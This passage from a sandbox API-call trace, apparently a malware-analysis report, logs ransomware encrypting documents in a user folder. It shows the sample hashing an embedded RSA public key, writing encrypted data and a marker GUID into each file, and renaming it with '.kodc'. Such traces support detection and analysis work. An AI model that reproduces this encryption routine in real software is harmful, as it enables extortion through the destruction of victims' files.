| out: hHeap=0x630000) returned 1 [0098.424] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a9e8 | out: hHeap=0x630000) returned 1 [0098.424] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3298d18 | out: hHeap=0x630000) returned 1 [0098.424] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3316db8 | out: hHeap=0x630000) returned 1 [0098.424] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69bc60 | out: hHeap=0x630000) returned 1 [0098.424] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a9d0 | out: hHeap=0x630000) returned 1 [0098.424] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b9d138 | out: hHeap=0x630000) returned 1 [0098.424] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b96968 | out: hHeap=0x630000) returned 1 [0098.424] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69ba50 | out: hHeap=0x630000) returned 1 [0098.424] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3318ea0 | out: hHeap=0x630000) returned 1 [0098.424] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c428 | out: hHeap=0x630000) returned 1 [0098.424] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adf00 | out: hHeap=0x630000) returned 1 [0098.424] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ceca0 | out: hHeap=0x630000) returned 1 [0098.424] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adee0 | out: hHeap=0x630000) returned 1 [0098.424] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338fa8 | out: hHeap=0x630000) returned 1 [0098.424] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0098.424] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0098.425] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cc1c0 | out: hHeap=0x630000) returned 1 [0098.425] WriteFile (in: hFile=0x5cc, lpBuffer=0x9ba4d90*, nNumberOfBytesToWrite=0x95b7, lpNumberOfBytesWritten=0x9e2fb14, lpOverlapped=0x0 | out: lpBuffer=0x9ba4d90*, lpNumberOfBytesWritten=0x9e2fb14*=0x95b7, lpOverlapped=0x0) returned 1 [0098.425] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9ba4d90 | out: hHeap=0x630000) returned 1 [0098.425] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x95bc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0098.425] WriteFile (in: hFile=0x5cc, lpBuffer=0x69b948*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x69b948*, lpNumberOfBytesWritten=0x9e2fb50*=0x100, lpOverlapped=0x0) returned 1 [0098.425] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69b948 | out: hHeap=0x630000) returned 1 [0098.425] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce0d0 [0098.425] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x428) returned 0x333a888 [0098.425] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x333a888, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 41 [0098.425] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x430) returned 0x333b018 [0098.425] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333a888 | out: hHeap=0x630000) returned 1 [0098.425] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce0d0 | out: hHeap=0x630000) returned 1 [0098.425] WriteFile (in: hFile=0x5cc, lpBuffer=0x333b018*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x333b018*, lpNumberOfBytesWritten=0x9e2fb50*=0x28, lpOverlapped=0x0) returned 1 [0098.426] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333b018 | out: hHeap=0x630000) returned 1 [0098.426] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0098.426] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9e2fb50*=0x26, lpOverlapped=0x0) returned 1 [0098.426] CloseHandle (hObject=0x5cc) returned 1 [0098.427] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x32c2cb0 [0098.427] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x880) returned 0x32d0db8 [0098.427] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32c2cb0 | out: hHeap=0x630000) returned 1 [0098.427] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\JBBGBkI.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\jbbgbki.csv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\JBBGBkI.csv.kodc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\jbbgbki.csv.kodc")) returned 1 [0098.428] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0db8 | out: hHeap=0x630000) returned 1 [0098.428] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0098.428] VirtualFree (lpAddress=0x21b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0098.429] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65e7c0 | out: hHeap=0x630000) returned 1 [0098.429] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd2cb8e70, ftCreationTime.dwHighDateTime=0x1d55dbf, ftLastAccessTime.dwLowDateTime=0xd60b84f0, ftLastAccessTime.dwHighDateTime=0x1d5714c, ftLastWriteTime.dwLowDateTime=0xd60b84f0, ftLastWriteTime.dwHighDateTime=0x1d5714c, nFileSizeHigh=0x0, nFileSizeLow=0x250b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="KdLjJC 8d4JUT.docx", cAlternateFileName="KDLJJC~1.DOC")) returned 1 [0098.429] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce0d0 [0098.429] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8e) returned 0x65e7c0 [0098.429] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce0d0 | out: hHeap=0x630000) returned 1 [0098.429] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KdLjJC 8d4JUT.docx") returned=".docx" [0098.429] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KdLjJC 8d4JUT.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\kdljjc 8d4jut.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0098.429] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9e2fb40 | out: lpFileSize=0x9e2fb40*=9483) returned 1 [0098.429] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x21b0000 [0098.432] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x24e5, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0098.432] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9e2fb78, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb78*=0x26, lpOverlapped=0x0) returned 1 [0098.433] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0098.433] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0098.433] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0098.433] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9e2fb70, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb70*=0x250b, lpOverlapped=0x0) returned 1 [0098.433] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0098.433] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f1) returned 0x32d2a78 [0098.433] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0098.433] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0098.433] CryptAcquireContextW (in: phProv=0x9e2fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9e2fa50*=0x692d18) returned 1 [0098.434] CryptCreateHash (in: hProv=0x692d18, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9e2fa58 | out: phHash=0x9e2fa58) returned 1 [0098.434] CryptHashData (hHash=0x3331bc8, pbData=0x32d2a78, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0098.434] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x0, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9e2fa54) returned 1 [0098.434] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x32adf00 [0098.434] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x32adf00, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x32adf00, pdwDataLen=0x9e2fa54) returned 1 [0098.434] GetLastError () returned 0x0 [0098.435] CryptDestroyHash (hHash=0x3331bc8) returned 1 [0098.435] CryptReleaseContext (hProv=0x692d18, dwFlags=0x0) returned 1 [0098.435] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0098.435] UuidCreate (in: Uuid=0x9e2fa48 | out: Uuid=0x9e2fa48) returned 0x0 [0098.435] UuidToStringA (in: Uuid=0x9e2fa48, StringUuid=0x9e2fa40 | out: StringUuid=0x9e2fa40) returned 0x0 [0098.435] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0098.435] RpcStringFreeA (in: String=0x9e2fa40 | out: String=0x9e2fa40) returned 0x0 [0098.435] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0098.435] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0098.435] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2510) returned 0x9ba4d90 [0098.435] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0098.435] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0098.435] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32cc1c0 [0098.435] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0098.435] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32d2a78 [0098.435] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338fa8 [0098.435] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9b9d138 [0098.435] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a9d0 [0098.435] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9b9d180 [0098.435] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a9e8 [0098.435] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331aa18 [0098.435] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a520 [0098.435] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331aa30 [0098.435] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x334ce70 [0098.435] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x9b9f078 [0098.435] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x9b9f078, Size=0x218) returned 0x32d0958 [0098.435] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x333b018 [0098.435] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331aa18 | out: hHeap=0x630000) returned 1 [0098.435] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331aa30 | out: hHeap=0x630000) returned 1 [0098.435] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a520 | out: hHeap=0x630000) returned 1 [0098.436] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x334ce70 | out: hHeap=0x630000) returned 1 [0098.436] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333b018 | out: hHeap=0x630000) returned 1 [0098.436] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a520 [0098.436] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32ceca0 [0098.436] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x331aa30 [0098.436] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32adee0 [0098.436] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x331aa18 [0098.436] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cecc0 [0098.436] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x9b8c428 [0098.436] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fc30 [0098.436] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338ee8 [0098.436] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adf00 [0098.436] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x9b8c540 [0098.436] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32aed00 [0098.436] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec00 [0098.436] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c428 | out: hHeap=0x630000) returned 1 [0098.436] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331aa30 | out: hHeap=0x630000) returned 1 [0098.436] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0098.436] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331aa18 | out: hHeap=0x630000) returned 1 [0098.436] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adee0 | out: hHeap=0x630000) returned 1 [0098.436] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ceca0 | out: hHeap=0x630000) returned 1 [0098.436] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a520 | out: hHeap=0x630000) returned 1 [0098.436] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fc30 | out: hHeap=0x630000) returned 1 [0098.436] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338fa8 | out: hHeap=0x630000) returned 1 [0098.436] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0958 | out: hHeap=0x630000) returned 1 [0098.436] GetCurrentThreadId () returned 0x42c [0098.436] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69b948 [0098.436] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x9b8edb8 [0098.436] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x3316db8 [0098.436] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x692d18 [0098.436] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x3298d18 [0098.436] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ceca0 [0098.436] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0098.436] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69ba50 [0098.437] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0098.437] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0098.437] GetCurrentThreadId () returned 0x42c [0098.437] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0098.437] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0098.437] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x32b14c8 [0098.437] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0098.437] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0098.437] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0098.437] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0098.437] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32b14c8 | out: hHeap=0x630000) returned 1 [0098.437] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bc60 [0098.437] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ceca0 | out: hHeap=0x630000) returned 1 [0098.437] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x3318ea0 [0098.437] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ceca0 [0098.437] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bd68 [0098.437] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0098.437] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a520 [0098.437] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0098.437] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0098.437] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecb0 [0098.437] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec80 [0098.437] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec60 [0098.437] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec90 [0098.437] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec50 [0098.437] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0098.437] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331aa18 [0098.437] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecb0 | out: hHeap=0x630000) returned 1 [0098.437] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cecb0 [0098.437] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0098.437] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0098.437] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec70 [0098.437] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ced00 [0098.438] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cece0 [0098.438] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331aa30 [0098.438] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ced00 | out: hHeap=0x630000) returned 1 [0098.438] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adee0 [0098.438] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec70 | out: hHeap=0x630000) returned 1 [0098.438] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331aa00 [0098.438] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cece0 | out: hHeap=0x630000) returned 1 [0098.438] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x250b, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0098.438] WriteFile (in: hFile=0x5cc, lpBuffer=0x69b948*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x69b948*, lpNumberOfBytesWritten=0x9e2fb50*=0x100, lpOverlapped=0x0) returned 1 [0098.438] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69b948 | out: hHeap=0x630000) returned 1 [0098.438] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0098.438] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9e2fb50*=0x26, lpOverlapped=0x0) returned 1 [0098.439] CloseHandle (hObject=0x5cc) returned 1 [0098.454] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KdLjJC 8d4JUT.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\kdljjc 8d4jut.docx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KdLjJC 8d4JUT.docx.kodc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\kdljjc 8d4jut.docx.kodc")) returned 1 [0098.455] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0db8 | out: hHeap=0x630000) returned 1 [0098.455] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0098.455] VirtualFree (lpAddress=0x21b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0098.456] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65e7c0 | out: hHeap=0x630000) returned 1 [0098.456] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8eb9d910, ftCreationTime.dwHighDateTime=0x1d567df, ftLastAccessTime.dwLowDateTime=0xcb74b030, ftLastAccessTime.dwHighDateTime=0x1d5bc2d, ftLastWriteTime.dwLowDateTime=0xcb74b030, ftLastWriteTime.dwHighDateTime=0x1d5bc2d, nFileSizeHigh=0x0, nFileSizeLow=0x5e75, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MeuD nPJ7M67.docx", cAlternateFileName="MEUDNP~1.DOC")) returned 1 [0098.456] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\MeuD nPJ7M67.docx") returned=".docx" [0098.456] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\MeuD nPJ7M67.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\meud npj7m67.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0098.457] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9e2fb40 | out: lpFileSize=0x9e2fb40*=24181) returned 1 [0098.457] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x21b0000 [0098.460] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x5e4f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0098.460] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9e2fb78, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb78*=0x26, lpOverlapped=0x0) returned 1 [0098.461] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0098.461] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9e2fb70, 